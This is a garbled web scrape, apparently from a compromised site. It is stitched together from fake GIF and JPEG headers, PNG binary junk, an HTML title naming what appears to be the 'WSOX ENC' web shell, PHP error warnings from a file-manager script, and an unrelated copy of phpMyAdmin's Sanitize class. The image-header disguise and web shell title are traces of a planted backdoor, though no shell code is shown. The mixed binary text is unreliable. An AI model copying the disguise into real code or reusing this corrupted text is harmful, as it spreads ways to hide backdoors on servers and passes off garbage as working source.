1:45 PM 11/12/2025<!-- GIF89;a -->
<!-- GIF89;a -->
ï¿½ï¿½ï¿½ï¿½ JFIF      ï¿½ï¿½ ï¿½ 	  	 

	



 "" $(4,$&1'-=-157:::#+?D?8C49:7




7%%77777777777777777777777777777777777777777777777777ï¿½ï¿½  { ï¿½" ï¿½ï¿½               ï¿½ï¿½ 5        !1AQa"qï¿½2ï¿½ï¿½BRï¿½ï¿½#bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½                ï¿½ï¿½                 ï¿½ï¿½   ? ï¿½ï¿½D@DDD@DDD@DDkKï¿½ï¿½6 ï¿½UGï¿½4Vï¿½1ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ë¦Ÿï¿½@ï¿½#ï¿½ï¿½ï¿½RYï¿½dqpï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½oï¿½7ï¿½mï¿½sï¿½<ï¿½ï¿½VPSï¿½e~Vï¿½Ú†8ï¿½ï¿½ï¿½Xï¿½Tï¿½ï¿½$ï¿½ï¿½cï¿½ï¿½ 9ï¿½ï¿½á˜†ï¿½m6@ WUï¿½fï¿½Donï¿½ï¿½rï¿½ï¿½5}9ï¿½ï¿½}ï¿½ï¿½hcï¿½fFï¿½ï¿½/r=hiï¿½ï¿½ ï¿½Í‡ï¿½*ï¿½ï¿½ bï¿½.ï¿½ï¿½$0ï¿½&teï¿½ï¿½yï¿½@ï¿½Aï¿½Fï¿½=ï¿½ Pfï¿½Aï¿½ï¿½aï¿½ï¿½ï¿½Ëªï¿½ÂŒï¿½Ã‰ï¿½ï¿½U|ï¿½ ï¿½	3\ï¿½×´ H SZï¿½g46ï¿½Cï¿½ï¿½×¦ï¿½Û’	ï¿½b<ï¿½ï¿½ï¿½;mï¿½ï¿½ï¿½ï¿½RpØ¹^ï¿½ï¿½l7ï¿½ï¿½*ï¿½ï¿½ï¿½ï¿½ï¿½TFï¿½}ï¿½\ï¿½Mï¿½ï¿½ï¿½M%ï¿½'ï¿½ï¿½ï¿½ï¿½ï¿½Ù Ý½ï¿½vï¿½ ï¿½ï¿½!-ï¿½ï¿½ï¿½ï¿½ï¿½?ï¿½N!Laï¿½ï¿½A+[`#ï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½'ï¿½~oRï¿½?ï¿½ï¿½v^)ï¿½ï¿½=ï¿½ï¿½hï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½Xï¿½.ï¿½ï¿½ï¿½Ëƒï¿½ï¿½ï¿½ï¿½^Æï¿½ï¿½Ü¯sO"Bï¿½c>;
ï¿½eï¿½4ï¿½ï¿½5ï¿½kï¿½ï¿½/CBï¿½ï¿½.
 ï¿½J?ï¿½ï¿½;ï¿½Òˆï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½<ï¿½VZï¿½ê­¼2/)Í”jCï¿½ï¿½ï¿½×¢ï¿½Vï¿½Gï¿½!ï¿½ï¿½ï¿½!ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½ï¿½\ï¿½ï¿½ Kjï¿½Rï¿½ocï¿½hï¿½ï¿½ï¿½:Þ Iï¿½ï¿½1"2ï¿½q×°8ï¿½ï¿½Ð @×–ï¿½ï¿½ï¿½_C0ï¿½Ö€ï¿½ï¿½Aï¿½ï¿½lQï¿½ï¿½@çº¼ï¿½!7ï¿½ï¿½Fï¿½ï¿½ ï¿½]ï¿½sZ
Bï¿½62rï¿½vï¿½z~ï¿½Kï¿½7ï¿½cï¿½ï¿½5ï¿½.ï¿½ï¿½ï¿½Ó„q&ï¿½Zï¿½dï¿½<ï¿½kkï¿½ï¿½ï¿½T&8ï¿½|ï¿½ï¿½ï¿½Iï¿½ï¿½ï¿½ï¿½ Ws}ï¿½ï¿½ï¿½Ç½ï¿½cqnÎ‘ï¿½_ï¿½ï¿½ï¿½3ï¿½ï¿½|Nï¿½-y,ï¿½ï¿½iï¿½ï¿½ï¿½È—_ï¿½\60ï¿½ï¿½ï¿½@ï¿½ï¿½6ï¿½ï¿½ï¿½ï¿½D@DDD@DDD@DDD@DDD@DDcï¿½KN66<ï¿½cï¿½ï¿½64=rï¿½ï¿½ï¿½ï¿½ï¿½
ÄŽ0ï¿½ï¿½hï¿½ï¿½ï¿½t&(ï¿½hnb[ï¿½ ?ï¿½ï¿½^ï¿½ï¿½\ï¿½ï¿½Ã¢|ï¿½,ï¿½/hï¿½\ï¿½ï¿½Rï¿½ï¿½5ï¿½?
ï¿½0ï¿½!×¦Ü‰-ï¿½ï¿½ï¿½ï¿½Gï¿½ï¿½ï¿½ï¿½Ù¬ï¿½ï¿½Qï¿½zAï¿½ï¿½ï¿½1ï¿½ï¿½ï¿½ï¿½ï¿½Vï¿½ï¿½ï¿½ ï¿½:Rï¿½ï¿½ï¿½`ï¿½$ï¿½ï¿½ikï¿½ï¿½Hï¿½ï¿½ï¿½ï¿½D4ï¿½ï¿½ï¿½ï¿½ï¿½#dkï¿½ï¿½ï¿½ï¿½ï¿½ hï¿½}ï¿½ï¿½ï¿½ï¿½7ï¿½ï¿½ï¿½w%ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½*o8wGï¿½LycuTï¿½.ï¿½ï¿½ï¿½Ü¯7ï¿½ï¿½Iï¿½ï¿½u^ï¿½ï¿½ï¿½)ï¿½ï¿½/cï¿½,sï¿½Nqï¿½Ûºï¿½;ï¿½×šï¿½YH2ï¿½ï¿½ï¿½.5Bï¿½ï¿½ï¿½DDD@DDD@DDD@DDD@DDD@V|ï¿½aï¿½j{7cï¿½ï¿½Xï¿½F\ï¿½3MuA×¾hbï¿½	ï¿½ï¿½nï¿½ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½ï¿½	ï¿½ï¿½8ï¿½(ï¿½ï¿½eï¿½ï¿½ï¿½ï¿½Ppï¿½\"Gï¿½`sï¿½ï¿½mï¿½ï¿½Þ§aWï¿½Kï¿½ï¿½Oï¿½ï¿½ï¿½ï¿½|;eiï¿½ï¿½ï¿½ï¿½Ö‹ï¿½[ï¿½qï¿½ï¿½";aï¿½ï¿½1ï¿½ï¿½ï¿½ï¿½Yï¿½Gï¿½W/ï¿½ß‡ï¿½&ï¿½<ï¿½ï¿½ï¿½ÐŒï¿½H'qï¿½mï¿½ï¿½<sŒÅá0™dkÈ.tc˜:z­G†:<FV2Zu“V

N(ëá’b&1K
¼Àë_Û{®®×ñ5ÇÁ(HæŒíh¡£{è.×€ˆˆˆ€ˆˆˆ€ˆˆˆ€ˆˆˆ€ˆˆˆƒ*~\<Pº7 ¸ºíÀi°ïê JT8–F
	 iëÝÏêÛZZÓ·”•'àÞöx¤–F5s²ì†
ñRÇ75ïNÊÒ&I,l‘ÐÀ–ZøË®ÅX¡Ìé½_$¸o‡(šg´Ë²ù¬5§5X?Sì¤ÂÇãø‹ñ†LvÆ6†µÛ]ïÙ|bGŒ<:ÂKœs OÜû­˜Ü\|+ H²YB&—ß›[ç×_nÔƒŸüO‰Å¶ÅAÞ¤nþÝ‚£_r½ÒHç¿W8Ù5VWÂ" """ """ """ """ ""ÈXY ê?Ë!¶ê4ùŽ–íuò ®8ŽG²1AöÞE´*ÁýÀM/á—¡‘Ù
œ$@"ÏÊj·åË©Vr;À‡ÅÄ[k0e­
såh>ï¿½)ï¿½X+!ï¿½ï¿½ï¿½=ï¿½mï¿½Ûšä¸·~6a^Xï¿½)ï¿½ï¿½ï¿½,ï¿½>#&6Gï¿½ï¿½ï¿½Yï¿½ï¿½{ï¿½ï¿½ï¿½ï¿½"" """ """ """ """ ""ï¿½ï¿½at\/ï¿½aï¿½8 ï¿½yp%ï¿½lhlï¿½nï¿½ï¿½ï¿½ï¿½)ï¿½ï¿½ï¿½iï¿½tï¿½ï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½?ï¿½ï¿½<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>modskinlienminh.com - WSOX ENC</title>

‰PNG

   
IHDR   Ÿ   f   Õ†C1   sRGB ®Îé   gAMA  ±üa   	pHYs  Ã  ÃÇo¨d  GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT

h25jguaT5*！﻿‰PNG

   
IHDR   Ÿ   f   Õ†C1   sRGB ®Îé   gAMA  ±üa   	pHYs  Ã  ÃÇo¨d  GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT

h25jguaT5*！<br />
<b>Warning</b>:  Undefined variable $authorization in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>57</b><br />
<br />
<b>Warning</b>:  Undefined variable $translation in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>118</b><br />
<br />
<b>Warning</b>:  Trying to access array offset on value of type null in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>119</b><br />
<br />
<b>Warning</b>:  file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
 in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>120</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>247</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>248</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>249</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>250</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>251</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>252</b><br />
<?php
/**
 * This class includes various sanitization methods that can be called statically
 */

declare(strict_types=1);

namespace PhpMyAdmin;

use PhpMyAdmin\Html\MySQLDocumentation;

use function __;
use function array_keys;
use function array_merge;
use function count;
use function htmlspecialchars;
use function in_array;
use function is_array;
use function is_bool;
use function is_int;
use function is_string;
use function preg_match;
use function preg_replace;
use function preg_replace_callback;
use function str_replace;
use function str_starts_with;
use function strlen;
use function strtolower;
use function strtr;
use function substr;

/**
 * This class includes various sanitization methods that can be called statically
 */
class Sanitize
{
    /**
     * Checks whether given link is valid
     *
     * @param string $url   URL to check
     * @param bool   $http  Whether to allow http links
     * @param bool   $other Whether to allow ftp and mailto links
     */
    public static function checkLink($url, $http = false, $other = false): bool
    {
        $url = strtolower($url);
        $valid_starts = [
            'https://',
            './url.php?url=https%3a%2f%2f',
            './doc/html/',
            './index.php?',
        ];
        $is_setup = self::isSetup();
        // Adjust path to setup script location
        if ($is_setup) {
            foreach ($valid_starts as $key => $value) {
                if (substr($value, 0, 2) !== './') {
                    continue;
                }

                $valid_starts[$key] = '.' . $value;
            }
        }

        if ($other) {
            $valid_starts[] = 'mailto:';
            $valid_starts[] = 'ftp://';
        }

        if ($http) {
            $valid_starts[] = 'http://';
        }

        if ($is_setup) {
            $valid_starts[] = '?page=form&';
            $valid_starts[] = '?page=servers&';
        }

        foreach ($valid_starts as $val) {
            if (substr($url, 0, strlen($val)) == $val) {
                return true;
            }
        }

        return false;
    }

    /**
     * Check if we are currently on a setup folder page
     */
    public static function isSetup(): bool
    {
        return $GLOBALS['config'] !== null && $GLOBALS['config']->get('is_setup');
    }

    /**
     * Callback function for replacing [a@link@target] links in bb code.
     *
     * @param array $found Array of preg matches
     *
     * @return string Replaced string
     */
    public static function replaceBBLink(array $found)
    {
        /* Check for valid link */
        if (! self::checkLink($found[1])) {
            return $found[0];
        }

        /* a-z and _ allowed in target */
        if (! empty($found[3]) && preg_match('/[^a-z_]+/i', $found[3])) {
            return $found[0];
        }

        /* Construct target */
        $target = '';
        if (! empty($found[3])) {
            $target = ' target="' . $found[3] . '"';
            if ($found[3] === '_blank') {
                $target .= ' rel="noopener noreferrer"';
            }
        }

        /* Construct url */
        if (substr($found[1], 0, 4) === 'http') {
            $url = Core::linkURL($found[1]);
        } else {
            $url = $found[1];
        }

        return '<a href="' . $url . '"' . $target . '>';
    }

    /**
     * Callback function for replacing [doc@anchor] links in bb code.
     *
     * @param string[] $found Array of preg matches
     */
    public static function replaceDocLink(array $found): string
    {
        if (count($found) >= 4) {
            /* doc@page@anchor pattern */
            $page = $found[1];
            $anchor = $found[3];
        } else {
            /* doc@anchor pattern */
            $anchor = $found[1];
            if (str_starts_with($anchor, 'faq')) {
                $page = 'faq';
            } elseif (str_starts_with($anchor, 'cfg')) {
                $page = 'config';
            } else {
                /* Guess */
                $page = 'setup';
            }
        }

        $link = MySQLDocumentation::getDocumentationLink($page, $anchor, self::isSetup() ? '../' : './');

        return '<a href="' . $link . '" target="documentation">';
    }

    /**
     * Sanitizes $message, taking into account our special codes
     * for formatting.
     *
     * If you want to include result in element attribute, you should escape it.
     *
     * Examples:
     *
     * <p><?php echo Sanitize::sanitizeMessage($foo); ?></p>
     *
     * <a title="<?php echo Sanitize::sanitizeMessage($foo, true); ?>">bar</a>
     *
     * @param string $message the message
     * @param bool   $escape  whether to escape html in result
     * @param bool   $safe    whether string is safe (can keep < and > chars)
     */
    public static function sanitizeMessage(string $message, $escape = false, $safe = false): string
    {
        if (! $safe) {
            $message = strtr($message, ['<' => '&lt;', '>' => '&gt;']);
        }

        /* Interpret bb code */
        $replace_pairs = [
            '[em]' => '<em>',
            '[/em]' => '</em>',
            '[strong]' => '<strong>',
            '[/strong]' => '</strong>',
            '[code]' => '<code>',
            '[/code]' => '</code>',
            '[kbd]' => '<kbd>',
            '[/kbd]' => '</kbd>',
            '[br]' => '<br>',
            '[/a]' => '</a>',
            '[/doc]' => '</a>',
            '[sup]' => '<sup>',
            '[/sup]' => '</sup>',
            '[conferr]' => '<iframe src="show_config_errors.php"><a href='
                . '"show_config_errors.php">show_config_errors.php</a></iframe>',
            // used in libraries/Util.php
            '[dochelpicon]' => Html\Generator::getImage('b_help', __('Documentation')),
        ];

        $message = strtr($message, $replace_pairs);

        /* Match links in bb code ([a@url@target], where @target is options) */
        $pattern = '/\[a@([^]"@]*)(@([^]"]*))?\]/';

        /* Find and replace all links */
        $message = (string) preg_replace_callback($pattern, static function (array $match) {
            return self::replaceBBLink($match);
        }, $message);

        /* Replace documentation links */
        $message = (string) preg_replace_callback(
            '/\[doc@([a-zA-Z0-9_-]+)(@([a-zA-Z0-9_-]*))?\]/',
            /** @param string[] $match */
            static function (array $match): string {
                return self::replaceDocLink($match);
            },
            $message
        );

        /* Possibly escape result */
        if ($escape) {
            $message = htmlspecialchars($message);
        }

        return $message;
    }

    /**
     * Sanitize a filename by removing anything besides legit characters
     *
     * Intended usecase:
     *    When using a filename in a Content-Disposition header
     *    the value should not contain ; or "
     *
     *    When exporting, avoiding generation of an unexpected double-extension file
     *
     * @param string $filename    The filename
     * @param bool   $replaceDots Whether to also replace dots
     *
     * @return string  the sanitized filename
     */
    public static function sanitizeFilename($filename, $replaceDots = false)
    {
        $pattern = '/[^A-Za-z0-9_';
        // if we don't have to replace dots
        if (! $replaceDots) {
            // then add the dot to the list of legit characters
            $pattern .= '.';
        }

        $pattern .= '-]/';
        $filename = preg_replace($pattern, '_', $filename);

        return $filename;
    }

    /**
     * Format a string so it can be a string inside JavaScript code inside an
     * eventhandler (onclick, onchange, on..., ).
     * This function is used to displays a javascript confirmation box for
     * "DROP/DELETE/ALTER" queries.
     *
     * @param string $a_string       the string to format
     * @param bool   $add_backquotes whether to add backquotes to the string or not
     *
     * @return string   the formatted string
     */
    public static function jsFormat($a_string = '', $add_backquotes = true)
    {
        $a_string = htmlspecialchars((string) $a_string);
        $a_string = self::escapeJsString($a_string);
        // Needed for inline javascript to prevent some browsers
        // treating it as a anchor
        $a_string = str_replace('#', '\\#', $a_string);

        return $add_backquotes
            ? Util::backquote($a_string)
            : $a_string;
    }

    /**
     * escapes a string to be inserted as string a JavaScript block
     * enclosed by <![CDATA[ ... ]]>
     * this requires only to escape ' with \' and end of script block
     *
     * We also remove NUL byte as some browsers (namely MSIE) ignore it and
     * inserting it anywhere inside </script would allow to bypass this check.
     *
     * @param string $string the string to be escaped
     *
     * @return string  the escaped string
     */
    public static function escapeJsString($string)
    {
        return preg_replace(
            '@</script@i',
            '</\' + \'script',
            strtr(
                (string) $string,
                [
                    "\000" => '',
                    '\\' => '\\\\',
                    '\'' => '\\\'',
                    '"' => '\"',
                    "\n" => '\n',
                    "\r" => '\r',
                ]
            )
        );
    }

    /**
     * Formats a value for javascript code.
     *
     * @param string|bool|int $value String to be formatted.
     *
     * @return int|string formatted value.
     */
    public static function formatJsVal($value)
    {
        if (is_bool($value)) {
            if ($value) {
                return 'true';
            }

            return 'false';
        }

        if (is_int($value)) {
            return $value;
        }

        return '"' . self::escapeJsString($value) . '"';
    }

    /**
     * Formats an javascript assignment with proper escaping of a value
     * and support for assigning array of strings.
     *
     * @param string $key    Name of value to set
     * @param mixed  $value  Value to set, can be either string or array of strings
     * @param bool   $escape Whether to escape value or keep it as it is
     *                       (for inclusion of js code)
     *
     * @return string Javascript code.
     */
    public static function getJsValue($key, $value, $escape = true)
    {
        $result = $key . ' = ';
        if (! $escape) {
            $result .= $value;
        } elseif (is_array($value)) {
            $result .= '[';
            foreach ($value as $val) {
                $result .= self::formatJsVal($val) . ',';
            }

            $result .= "];\n";
        } else {
            $result .= self::formatJsVal($value) . ";\n";
        }

        return $result;
    }

    /**
     * Removes all variables from request except allowed ones.
     *
     * @param string[] $allowList list of variables to allow
     */
    public static function removeRequestVars(&$allowList): void
    {
        // do not check only $_REQUEST because it could have been overwritten
        // and use type casting because the variables could have become
        // strings
        $keys = array_keys(
            array_merge((array) $_REQUEST, (array) $_GET, (array) $_POST, (array) $_COOKIE)
        );

        foreach ($keys as $key) {
            if (! in_array($key, $allowList)) {
                unset($_REQUEST[$key], $_GET[$key], $_POST[$key]);
                continue;
            }

            // allowed stuff could be compromised so escape it
            // we require it to be a string
            if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {
                unset($_REQUEST[$key]);
            }

            if (isset($_POST[$key]) && ! is_string($_POST[$key])) {
                unset($_POST[$key]);
            }

            if (isset($_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {
                unset($_COOKIE[$key]);
            }

            if (! isset($_GET[$key]) || is_string($_GET[$key])) {
                continue;
            }

            unset($_GET[$key]);
        }
    }
}